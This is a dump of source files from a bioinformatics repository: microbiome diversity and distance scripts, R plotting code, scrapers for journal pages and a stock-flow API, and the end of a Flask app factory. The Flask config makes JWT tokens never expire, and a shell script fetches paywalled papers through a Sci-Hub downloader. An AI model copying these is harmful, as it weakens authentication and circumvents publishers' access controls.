"text": "from app.views.interest_views import bp_interest\nfrom app.views.photo_view import bp_photo\nfrom flask import Flask\nfrom flask_jwt_extended import JWTManager\nfrom app.models import db, ma, mg\nfrom secrets import token_hex\nfrom app.views.owner_views import bp_owner\nfrom app.views.dog_views import bp_dogs\n\nfrom app.views.home import bp_home\nfrom app.views.breed_views import bp_breed\nfrom app.views.authorization_view import bp_authorization\nfrom app.views.message_view import bp_message\nfrom app.views.conversation_view import bp_conversation\nfrom app.views.like_views import bp_like\n\nconfigs = {\n 'development': 'DevelopmentConfig',\n 'production': 'ProductionConfig',\n 'test': 'TestingConfig'\n}\n\n\ndef create_app(config='production'):\n\n app = Flask(__name__)\n app.config.from_object(f'config.{configs[config]}')\n app.config['JWT_SECRET_KEY'] = token_hex(16)\n app.config['JWT_ACCESS_TOKEN_EXPIRES'] = False\n JWTManager(app)\n\n db.init_app(app)\n mg.init_app(app, db)\n ma.init_app(app)\n\n app.register_blueprint(bp_owner)\n app.register_blueprint(bp_dogs)\n\n app.register_blueprint(bp_home)\n app.register_blueprint(bp_breed)\n\n app.register_blueprint(bp_authorization)\n app.register_blueprint(bp_message)\n app.register_blueprint(bp_conversation)\n\n app.register_blueprint(bp_like)\n app.register_blueprint(bp_photo)\n app.register_blueprint(bp_interest)\n\n return app\n"
}
] | 5 |
Nonewood/Bioinformatics | https://github.com/Nonewood/Bioinformatics | 0e2446945576c72ef9ba397fd80cd1b9c0b83f86 | 5e54522af24733565a0f71c1f468843cad08203d | d899cccc3c83b125c3c0910cafad0d9337e24628 | refs/heads/master | 2021-07-07T03:54:19.272097 | 2020-07-13T01:44:37 | 2020-07-13T01:44:37 | 137,748,051 | 16 | 5 | null | 2018-06-18T12:19:07 | 2020-05-21T03:31:40 | 2020-06-10T06:15:07 | Python | [
{
"alpha_fraction": 0.6674972176551819,
"alphanum_fraction": 0.6769102811813354,
"avg_line_length": 47.81081008911133,
"blob_id": "79340d4b9cdc9691d2385082c6daba56746faeda",
"content_id": "6d94937c78335dfcb09029ac12295c08134b3090",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3720,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 74,
"path": "/rat/beta/beta_diversity.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n#将总的距离文件按照组别分组并且生成用于画图的组间和组内的表格\nimport pandas as pd\nimport sys\nbeta_diversityfile = sys.argv[1]\noutdir = sys.argv[2]\npar = [beta_diversityfile,outdir]\nif not all (par):\n\tprint('you silly fool!')\n\texit()\n\ndt = pd.read_table(beta_diversityfile, header=0, index_col=0)\nexpose_diversity = dt.loc[dt.index.str.contains('-a') == False, dt.columns.str.contains('-a') == False] #这个用法比较巧妙,行名不包含'-a'的行;\nrecovery_diversity = dt.loc[dt.index.str.contains('-a'), dt.columns.str.contains('-a')] # 行名包含 '-a' 的行;\nFexpose_diversity = expose_diversity.loc[expose_diversity.index.str.contains('F\\d'),expose_diversity.columns.str.contains('F\\d')]\nMexpose_diversity = expose_diversity.loc[expose_diversity.index.str.contains('M\\d'),expose_diversity.columns.str.contains('M\\d')]\nFrecovery_diversity = recovery_diversity.loc[recovery_diversity.index.str.contains('F\\d'),recovery_diversity.columns.str.contains('F\\d')]\nMrecovery_diversity = recovery_diversity.loc[recovery_diversity.index.str.contains('M\\d'),recovery_diversity.columns.str.contains('M\\d')]\n\ndef distance_cal(dt,temp):\n\tdistance = dict()\n\tfor Id1 in dt.columns:\n\t\tfor Id2 in dt.columns:\n\t\t\tkey = Id1 + ':' + Id2\n\t\t\tkey_temp = Id2 + ':' + Id1\n\t\t\tvalue = dt.loc[Id1,Id2]\n\t\t\tif (key in distance) or (key_temp in distance):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdistance[key] = value\n\tACK_ACK = open(temp + '/ACK-ACK.distance.txt','w')\n\tprint('individuals\\tdistance\\tgroup', file=ACK_ACK)\n\tEL_EL = open(temp +'/EL-EL.distance.txt','w')\n\tprint('individuals\\tdistance\\tgroup', file=EL_EL)\n\tCig_Cig = open(temp + '/Cig-Cig.distance.txt','w')\n\tprint('individuals\\tdistance\\tgroup', file=Cig_Cig)\n\tACK_EL = open(temp + '/ACK-EL.distance.txt','w')\n\tprint('individuals\\tdistance\\tgroup', file=ACK_EL)\n\tACK_Cig = open(temp + '/ACK-Cig.distance.txt','w')\n\tprint('individuals\\tdistance\\tgroup', file=ACK_Cig)\n\tEL_Cig = open(temp + '/EL-Cig.distance.txt','w')\n\tprint('individuals\\tdistance\\tgroup', file=EL_Cig)\n\n\tfor key in distance:\n\t\tkey_split = key.split(':')\n\t\tif key_split[0] == key_split[1]:\n\t\t\tcontinue\n\t\tif key_split[0].startswith('ACK') and key_split[1].startswith('ACK'):\n\t\t\tprint(key + '\\t' + str(distance[key]) + '\\t' + 'ACK', file=ACK_ACK)\n\t\telif key_split[0].startswith('EL') and key_split[1].startswith('EL'):\n\t\t\tprint(key + '\\t' + str(distance[key]) + '\\t' + 'EL', file=EL_EL)\n\t\telif key_split[0].startswith('Cig') and key_split[1].startswith('Cig'):\n\t\t\tprint(key + '\\t' + str(distance[key]) + '\\t' + 'Cig', file=Cig_Cig)\n\t\telif (key_split[0].startswith('ACK') and key_split[1].startswith('EL')) or (key_split[0].startswith('EL') and key_split[1].startswith('ACK')):\n\t\t\tprint(key + '\\t' + str(distance[key]) + '\\t' + 'ACK-EL', file=ACK_EL)\n\t\telif (key_split[0].startswith('ACK') and key_split[1].startswith('Cig')) or (key_split[0].startswith('Cig') and key_split[1].startswith('ACK')):\n\t\t\tprint(key + '\\t' + str(distance[key]) + '\\t' + 'ACK-Cig', file=ACK_Cig)\n\t\telif (key_split[0].startswith('EL') and key_split[1].startswith('Cig')) or (key_split[0].startswith('Cig') and key_split[1].startswith('EL')):\n\t\t\tprint(key + '\\t' + str(distance[key]) + '\\t' + 'El-Cig', file=EL_Cig)\n\tACK_ACK.close()\n\tEL_EL.close()\n\tCig_Cig.close()\n\tACK_EL.close()\n\tACK_Cig.close()\n\tEL_Cig.close()\n\nimport re\nlst = ['Fexpose_diversity','Mexpose_diversity','Frecovery_diversity','Mrecovery_diversity']\ndts = [Fexpose_diversity,Mexpose_diversity,Frecovery_diversity,Mrecovery_diversity]\nfor index in range(len(lst)):\n\tif re.search('(.*)_diversity',lst[index]):\n\t\tmatch = re.search('(.*)_diversity',lst[index])\n\t\ttemp = outdir + '/' + match.group(1)\n\t\tdistance_cal(dts[index],temp)\n"
},
{
"alpha_fraction": 0.6474423408508301,
"alphanum_fraction": 0.6845536828041077,
"avg_line_length": 36.60377502441406,
"blob_id": "9b4d3d54ca5bc001dba1218cb3671a84f4bc1a66",
"content_id": "a0290f89606438e9d7de0b3e2f6f364c3d2ab645",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2496,
"license_type": "no_license",
"max_line_length": 167,
"num_lines": 53,
"path": "/爬虫/paper_information.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#输入文献网址,获取文献题目,杂志名称,影响因子,发表日期\n#V1 目前只适合 Nature + cell 系列杂志,其他待测试,因为每个杂志的网站代码写法不一样;\n#昨晚看了关注的博主的一段话,我觉得很有道理,自己还是太懒了,而且也太笨了;\n#人生苦短,一切遵守 KISS 原则。持续构建一套自己都觉得很爽的灵活够用的渗透测试方法论,需要借用的借用,需要脚本化的脚本化,需要 Web 化的 Web 化,需要工程化的工程化,需要产品化的产品化,需要赚钱的赚钱,需要开源的开源。这里有一个关键点:团队作战,共同进步:-)\n#共勉\n\n#nature 系列\nimport requests,re\nfrom bs4 import BeautifulSoup\nurl = 'https://www.nature.com/articles/s41467-020-14676-4'\nr = requests.get(url)\nsoup = BeautifulSoup(r.content, \"lxml\")\ncontent = soup.prettify()\nsoup_match = re.search('datetime=\"(.*?)\"', content) ## 非贪婪匹配\ndate = soup_match.group(1)\nname = soup.find(class_ = 'c-article-info-details').get_text().split('\\n')[1]\ntitle = soup.find(class_ = 'c-article-title u-h1').get_text().split('\\n')[0]\n\nimport pandas as pd\ndt = pd.read_table('IF_2019.txt', index_col = 1) # 这个文件每年更新,在当前目录下\nIF_dict = dt['Journal Impact Factor'].to_dict()\nfor x in IF_dict:\n match = re.search(name, x, flags=re.IGNORECASE)\n if match:\n IF = IF_dict[x]\n \nprint(title) \nprint(name + ' | IF:' + IF + ' | Date ' + date )\n\n\n# cell 系列\nimport requests,re\nfrom bs4 import BeautifulSoup\nurl = 'https://www.cell.com/cell/fulltext/S0092-8674(20)30160-4?_returnURL=https%3A%2F%2Flinkinghub.elsevier.com%2Fretrieve%2Fpii%2FS0092867420301604%3Fshowall%3Dtrue'\nr = requests.get(url)\nsoup = BeautifulSoup(r.content, \"lxml\")\n\ndate = soup.find(class_ = 'article-header__publish-date__value').get_text().split('\\n')[0]\nname_pre = soup.find(class_ = 'upsell-box__banner upsell-box__control').get_text().split('\\n')[0]\nname = re.sub('Subscribe to ','', name_pre)\ntitle = soup.find(class_ = 'article-header__title').get_text().split('\\n')[0]\n\nimport pandas as pd\ndt = pd.read_table('/Users/tongxueer/Documents/文献/IF_2019.txt', index_col = 1)\nIF_dict = dt['Journal Impact Factor'].to_dict()\nfor x in IF_dict:\n match = re.search(name, x, flags=re.IGNORECASE)\n if match:\n IF = IF_dict[x]\nprint(title) \nprint(name + ' | IF:' + IF + ' | Date ' + date )\n\n# Bioinformatic 这个杂志爬取失败....\n\n"
},
{
"alpha_fraction": 0.5891719460487366,
"alphanum_fraction": 0.7388535141944885,
"avg_line_length": 33.88888931274414,
"blob_id": "f152e32e5cbdcda3d78bc5c9a985afc9777916d4",
"content_id": "754ae419c6ded2adc5fe22607748dbbaee32d10b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 316,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 9,
"path": "/Paper_information/Paper_information.sh",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/bash\n# doi\npython3 advanced_paper_informational.py -l \"10.1016/S0140-6736(19)32319-0\"\n\n# doi file, a list of doi, line break\n#python3 advanced_paper_informational.py -f doilist.txt\n\n# dowload the pdf, only support one doi in current version +.+, TBD\npython3 scihub.py -d \"10.1016/S0140-6736(19)32319-0\"\n"
},
{
"alpha_fraction": 0.6134020686149597,
"alphanum_fraction": 0.6211340427398682,
"avg_line_length": 34.272727966308594,
"blob_id": "7de099c4287c028e2b0028bb823ecda1765aeac4",
"content_id": "487adf47aa2de19939c78d7f134863b7aad8b8d1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 11,
"path": "/Maaslin/config_generate.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "import sys\ntsv = sys.argv[1]\nlast = int(sys.argv[2])\nwith open(tsv, 'r') as IN, open('generated_config', 'w') as out:\n\thead = IN.readline().strip('\\n').split('\\t')\n\tmetadata = head[last-1]\n\ttax = head[last]\n\tprint('Matrix: Metadata', file = out)\n\tprint('Read_PCL_Rows: -' + metadata, file = out)\n\tprint('\\nMatrix: Abundance', file = out)\n\tprint('Read_PCL_Rows: ' + tax + '-', file = out)\n"
},
{
"alpha_fraction": 0.6757369637489319,
"alphanum_fraction": 0.6984127163887024,
"avg_line_length": 32.92307662963867,
"blob_id": "97d2460f36679b57b66e6c25952d6280ceef084b",
"content_id": "297de815de22c5fed4a8db175b3f4804cc3825ce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 587,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 13,
"path": "/col_split.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "# 小脚本是什么鬼,涉及了某一列的分割,None 值的替换,计数,以及 uniques 功能\n#! /usr/bin/python3 \nimport pandas as pd\nfrom numpy import nan\n\ndf = pd.read_table('genome.list.filter.anno')\ntax = df['Taxonomy'].str.split(';', expand=True) # 按照分号将 'Taxonomy' 分割,并且储存成数据库格式\ntax.fillna(value=nan, inplace=True) # 将 None 替换为 Nan\nit2level= tax.count(axis=1) #按照列计数 \nid2level.unique() # unique 功能\n(id2level == 2).sum()\n(id2level == 6).sum()\n(id2level == 7).sum() # 统计门,属,种水平的基因数目\n"
},
{
"alpha_fraction": 0.6267003417015076,
"alphanum_fraction": 0.65546053647995,
"avg_line_length": 51.51020431518555,
"blob_id": "6849e777cb7b565025f506f4e09efeb33d00d043",
"content_id": "076a46d184985ce97fd362572dcb8d824cb56e7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 5154,
"license_type": "no_license",
"max_line_length": 340,
"num_lines": 98,
"path": "/rat/alpha_boxplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/Rscript\n#eg: Rscript alpha_boxplot.R expose_abd.txt Sample_information_detail.txt CK:E-liquid:Cigarette 67ab57:487eb3:d2382c \nlibrary(Rcpp,lib.loc=\"R_lib\")\nlibrary(tidyr,lib.loc=\"R_lib\")\nlibrary(tidyselect,lib.loc=\"R_lib\")\nArgs <- commandArgs(TRUE)\ninput = Args[1] # alpha diversity file, including number and shannon\ngroup = Args[2] # F_Sample_information_detail.xls\ngroup_list = Args[3] # E-liquid:Cigarette\ncolor_list = Args[4] # 487eb3:d2382c\nabd = read.table(input, header = T,sep = '\\t', row.names = 1, check.names = F)\ngroup = read.table(group, header = T,sep = '\\t', row.names = 1, check.names = F)\ncolor_var = unlist(strsplit(color_list, \":\"))\ncolor_var = c(paste(\"#\",color_var,sep=\"\"))\nlegend_list = unlist(strsplit(group_list, \":\"))\nfilename_prefix= gsub(\":\", \"_\", group_list)\n\nlibrary(ggplot2)\nlibrary(ggpubr,lib.loc=\"/ifshk7/BC_PS/wangpeng7/R_lib\")\ndt = cbind(abd,group)\n# number boxplot\nnumber_diff = compare_means(number ~ Group, dt, method = \"wilcox.test\") ## default wilcox.test\nwrite.table(number_diff,file = paste(filename_prefix,\"_number_Diffresult.txt\",sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(number_diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) {\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n diff_group <- as.character(diff_temp[row, c(2,3)])\n\tmy_comparisons[[row]] = diff_group\n}\nnumber_plot = ggplot(dt,aes(x=Group, y=number,colour=Group)) + geom_boxplot() + stat_compare_means(comparisons= my_comparisons ,label = \"p.signif\", label.y = c(0.02,0.04,0.09) + max(dt$number)) + scale_color_manual(values= color_var) + labs(x=\"\", y = \"Number\") + scale_y_continuous(limits = c(min(dt$number), max(dt$number) + 0.1)) + \n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.3,0, 0.1, 0.1), 'in'))\n} else {\nnumber_plot = ggplot(dt,aes(x=Group, y=number, colour=Group)) + geom_boxplot() + scale_color_manual(values= color_var) + labs(x=\"\", y = \"number\") +\n theme(axis.text = element_text(colour = 'black', size = 8,),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.3,0, 0.1, 0.1), 'in'))\n}\n# shannon boxplot\nshannon_diff = compare_means(shannon ~ Group, dt, method = \"wilcox.test\") \nwrite.table(shannon_diff,file = paste(filename_prefix,\"_shannon_Diffresult.txt\",sep=\"\"),sep = \"\\t\",quote = F,row.names = F)\ndiff_temp = as.data.frame(shannon_diff)\ndiff_temp = diff_temp[which(diff_temp$p < 0.05),]\nif (nrow(diff_temp) > 0 ) {\nmy_comparisons = list()\nfor (row in 1:nrow(diff_temp)) {\n \tdiff_group <- as.character(diff_temp[row, c(2,3)])\n my_comparisons[[row]] = diff_group\n}\nshannon_plot = ggplot(dt,aes(x=Group, y=shannon, colour=Group)) + geom_boxplot()+ stat_compare_means(comparisons= my_comparisons ,label = \"p.signif\", label.y = c(0.02,0.04,0.09) + max(dt$shannon)) + scale_color_manual(values= color_var) + labs(x=\"\", y = \"shannon\") + scale_y_continuous(limits = c(min(dt$shannon), max(dt$shannon) + 0.1)) + \n theme(axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.3, 0.1, 0.1, 0), 'in')) # 上 右 下 左\n} else {\nshannon_plot = ggplot(dt,aes(x=Group, y=shannon, colour=Group)) + geom_boxplot() + scale_color_manual(values= color_var) + labs(x=\"\", y = \"shannon\") +\n theme(axis.text = element_text(colour = 'black', size = 8),\n axis.text.x = element_text(vjust = 0.7, angle = 15),\n axis.title = element_text(size = 10),\n panel.background = element_blank(),\n axis.line = element_line(size=0.5, colour = \"black\"),\n legend.key = element_blank(), legend.title = element_blank(),\n legend.position='none',plot.margin = unit(c(0.3, 0.1, 0.1, 0), 'in'))\n}\n#output\npdf(paste(filename_prefix,\"alpha_boxplot.pdf\",sep=\"\"),width=6,height=4)\nlibrary(grid)\nlibrary(\"gridBase\")\nplot.new()\nplotlayout <- grid.layout(nrow=1,ncol=2)\nvp1 <- viewport(layout.pos.col=1,,layout.pos.row=1)\nvp2 <- viewport(layout.pos.col=2,layout.pos.row=1)\npushViewport(viewport(layout=plotlayout))\npushViewport(vp1)\n#par(new=TRUE,fig=gridFIG(),mai=c(1.1,1,0.3,0.2))\npar(new=TRUE,fig=gridFIG())\nprint(number_plot,newpage=FALSE)\npopViewport()\n\npushViewport(vp2)\npar(new=TRUE,fig=gridFIG())\nprint(shannon_plot,newpage=FALSE)\npopViewport()\ndev.off()\n"
},
{
"alpha_fraction": 0.45807769894599915,
"alphanum_fraction": 0.626789391040802,
"avg_line_length": 74.15384674072266,
"blob_id": "773891e03d97c443255e3393b80147b94de3311f",
"content_id": "d4ce1076162cd5e2819078c82b61405d26032027",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1064,
"license_type": "no_license",
"max_line_length": 299,
"num_lines": 13,
"path": "/爬虫/eastmoney.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "## 爬东财深股通,很粗糙的版本...\nimport requests,re\nfrom bs4 import BeautifulSoup\nurl = 'http://push2.eastmoney.com/api/qt/clist/get?pn=1&pz=50&po=1&np=1&ut=b2884a393a59ad64002292a3e90d46a5&fltt=2&invt=2&fid=f62&fs=b:BK0804&stat=1&fields=f12,f14,f2,f3,f62,f184,f66,f69,f72,f75,f78,f81,f84,f87,f204,f205,f124&rt=53091671&cb=jQuery183020346281626049056_1592750139884&_=1592750150231'\nres = requests.get(url)\nsoup = BeautifulSoup(res.content, \"html.parser\")\ncontent = soup.get_text().split('},{')\n# f12, f14, f62 , f66, f72 , f78 ,f84\nprint('\\t'.join(['代码','名称', '主力净流入', '超大单净流入', '大单净流入', '中单净流入', '小单净流入']))\nfor x in content:\n match = re.search('\\\"f12\\\":\\\"(.*?)\\\".*\\\"f14\\\":\\\"(.*?)\\\".*\\\"f62\\\":(.*?),.*\\\"f66\\\":(.*?),.*\\\"f72\\\":(.*?),.*\\\"f78\\\":(.*?),.*\\\"f84\\\":(.*?),', x)\n (code, name, main, sup, big, mid, sml) = (match.group(1), match.group(2),match.group(3), match.group(4), match.group(5), match.group(6), match.group(7) )\n print('\\t'.join([code, name, main, sup, big, mid, sml])) \n"
},
{
"alpha_fraction": 0.6811320781707764,
"alphanum_fraction": 0.6937106847763062,
"avg_line_length": 36.85714340209961,
"blob_id": "413cab3ce629a101ba9dddb96c556372c99e11d1",
"content_id": "6f83f915c58e22d02fadf3f11512bfb86a4286c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1616,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 42,
"path": "/diversity.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\nimport argparse,re,os,math\nimport pandas as pd\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nCalculate the diversity index based on abundance file with pandas, only include number and shannon so far.\nExample: python3 diversity.py -i GeneCatalog_profile.xls.gz\nTo be continued.\nmood:feel happy to do such things, do not need to think of bad things.\n------------------'''\n)\nparser.add_argument('-i','--Input', help = \"the abundance file.\")\nparser.add_argument('-o','--outdir',help = \"the output directory,default is current working directory.\",nargs='?')\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs=parser.parse_args()\nabdfile = args.Input\noutdir = args.outdir if args.outdir else './'\nout = outdir + '/diversity.txt'\n\nif not abdfile:\n parser.print_help() # 如果不加参数,则打印 help 信息;\n exit()\n\nif abdfile.endswith('gz'):\n\tdf = pd.read_csv(abdfile, compression='gzip', header=0, sep='\\t')\nelse:\n\tdf = pd.read_csv(abdfile, header=0, sep='\\t')\n\ndf.columns.values[0] = 'geneID'\ndf = df.set_index('geneID')\nsampleNumber = (df!=0).sum(axis=1)\nindexSelect = sampleNumber.index[sampleNumber >= 81*0.1]\ndfSelect = df.loc[indexSelect]\ndfSelectSum = dfSelect.div(dfSelect.sum(axis=0), axis=1)\ndt = dfSelectSum\ngeneNumber = (dt!=0).sum(axis=0)\nshannon = dt.apply(lambda x: [-math.log(y)*y if y > 0 else 0 for y in x]).sum()\ndiversity = pd.concat([geneNumber, shannon], axis=1, keys=['number','shannon'])\ndiversity.to_csv(out, sep='\\t')\n"
},
{
"alpha_fraction": 0.6724637746810913,
"alphanum_fraction": 0.7014492750167847,
"avg_line_length": 30.363636016845703,
"blob_id": "f8eb2bd22a7dd9dfcaf7e51be49e65542a12925b",
"content_id": "e3cc8758bec7f0e3da7b2607ed204d2ab46e951e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 11,
"path": "/profileNorm.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#用来将丰度文件归一化\n#! /usr/bin/Rscript\n#usage Rscript **.R Rat_10gene_phylum_abundance_profile.xls phylumProfileTable.xls\nArgs = commandArgs()\ninput = Args[6]\noutput = Args[7]\ndt = read.table(input,header=T,sep=\"\\t\")\nrownames(dt) = dt[,1]\ndf = dt[,-1]\ndfNorm = t(t(df)/apply(df,2,sum))*100\nwrite.table(dfNorm,file=output,sep=\"\\t\",quote=F,col.names=NA)\n"
},
{
"alpha_fraction": 0.6819671988487244,
"alphanum_fraction": 0.687213122844696,
"avg_line_length": 31.446807861328125,
"blob_id": "9f395f51e37ef53b858947158acda04891729985",
"content_id": "ef1c6405dbb8f6e89971585a6ff7b575fd60f1f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1571,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 47,
"path": "/rat/beta/braycurtis.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n# 计算 beta 多样性\nimport argparse,re,os,math\nimport pandas as pd\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nGenerate the bray-curtis distance matrix based on abundance file.\nExample: python3 braycurtis.py -i GeneCatalog_profile.xls.gz\nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--Input', help = \"the abundance file.\")\nparser.add_argument('-o','--outdir',help = \"the output directory,default is current working directory.\",nargs='?')\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs=parser.parse_args()\nabdfile = args.Input\noutdir = args.outdir if args.outdir else './'\nif not os.path.exists(outdir):\n\tos.makedirs(outdir)\nout = outdir + '/braycurtis.txt'\n\nif not abdfile:\n\tparser.print_help()\n\texit()\n\nif abdfile.endswith('gz'):\n\tdf = pd.read_csv(abdfile, compression='gzip', header=0, sep='\\t')\nelse:\n\tdf = pd.read_csv(abdfile, header=0, sep='\\t')\n\nfrom scipy.spatial import distance\nimport pandas as pd\ndt = pd.read_table(abdfile, index_col=0)\n#dt.index = dt['geneID']\n#dt.drop(['geneID'], axis=1, inplace=True) #好奇怪,我为什么要加这两行... 已然忘记了..\nwith open(out, 'w') as bray:\n\tprint('\\t' + '\\t'.join(dt.columns.values), file = bray)\n\tfor first in dt.columns.values:\n\t\tlst = list()\n\t\tlst.append(first)\n\t\tfor second in dt.columns.values:\n\t\t\tdis = distance.braycurtis(dt[first], dt[second])\n\t\t\tlst.append(str(dis))\n\t\tprint('\\t'.join(lst), file=bray)\n"
},
{
"alpha_fraction": 0.6630170345306396,
"alphanum_fraction": 0.6715328693389893,
"avg_line_length": 39.426231384277344,
"blob_id": "b97011fbee2e8e5bd38ef4f219b4bea9ce6204fd",
"content_id": "a2f1320ab155e52cddf4eed80e8adcbc04bd3d59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2556,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 61,
"path": "/rat/choose.py",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/python3\n# 利用 python 筛选数据,主要是使用 dt.columns.str.contains 这个功能,屡试不爽,即可以正则匹配,又可以使用运算符!\nimport pandas as pd\nimport argparse,os,re\nparser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description='''\n-------------------\nSimple Introduction:\nchoose columns of the file by characters in rownames or colnames\nExample: python3 split.py -i expose_genusProfileTable.xls -g Sample_information_detail.txt -s Cig-F:EL-F -o ./ \nTo be continued.\n------------------'''\n)\nparser.add_argument('-i','--Input', help = \"the abundance file.\", nargs='?') \nparser.add_argument('-g','--group', help = \"the group file.\", nargs='?')\nparser.add_argument('-s','--splitID', help = \"the character for spliting.\")\nparser.add_argument('-o','--outdir',help = \"the output directory,default is current working directory.\",nargs='?')\nparser.add_argument(\"-v\", \"--version\",action='version', version='%(prog)s 1.0')\nargs=parser.parse_args()\nabdfile = args.Input\ngroupfile = args.group\nsplitlist = args.splitID\noptionpar = [abdfile,groupfile]\nif not any(optionpar):\n\tprint('\\nError:you need add abundance or group file!\\n')\n\tparser.print_help()\n\texit()\nif not splitlist:\n\tprint('\\nError:you need add split character!\\n')\n\tparser.print_help()\n\texit()\noutdir = args.outdir if args.outdir else '.'\n\nif abdfile:\n\tname = os.path.basename(abdfile)\n#\tdt = pd.read_table(abdfile, header=0, index_col=0)\n\tdt = pd.read_table(abdfile, header=0)\n\tdt.set_index(dt.columns[0], inplace=True) # for gene profile\n\tlst = splitlist.split(':') #two element \n\tif len(lst) > 1:\n\t\tmatch = re.search('.*-(.*)',lst[0])\n\t\toutfile = outdir + '/' + match.group(1) + '_' + name\n\t\twith open(outfile,'w') as out:\n\t\t\tdt_temp = dt.loc[:,dt.columns.str.contains(lst[0])|dt.columns.str.contains(lst[1])]\n\t\t\tdt_temp = dt_temp.loc[(dt_temp != 0).sum(axis=1) != 0,:]\n\t\t\tdt_temp.to_csv(outfile, sep='\\t')\n\telse:\n\t\texpose_dt = dt.loc[:,dt.columns.str.contains('-a') == False] #暂且写成这样..\n\t\trecovery_dt = dt.loc[:,dt.columns.str.contains('-a')]\n\t\texpose_dt.to_csv('expose_'+name, sep='\\t')\n\t\trecovery_dt.to_csv('recovery_'+name, sep='\\t')\t\t\n\nif groupfile:\n\tname = os.path.basename(groupfile)\n\tgroup = pd.read_table(groupfile, header=0, index_col=0)\n\tlst = splitlist.split(':')\n\toutfile = outdir + '/' + match.group(1) + '_' + name\n\twith open(outfile,'w') as out:\n\t\tgroup_temp = group.loc[group.index.str.contains(lst[0])|group.index.str.contains(lst[1]),:]\n\t\tgroup_temp.to_csv(outfile, sep='\\t')\n"
},
{
"alpha_fraction": 0.6161757707595825,
"alphanum_fraction": 0.6503039002418518,
"avg_line_length": 41.779998779296875,
"blob_id": "3973d85ccec722bfd4211026e17d44300fec34f6",
"content_id": "30009774dbd09bd34459d78e9ee2c14274b434fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "R",
"length_bytes": 2197,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 50,
"path": "/rat/diff/FB_boxplot.R",
"repo_name": "Nonewood/Bioinformatics",
"src_encoding": "UTF-8",
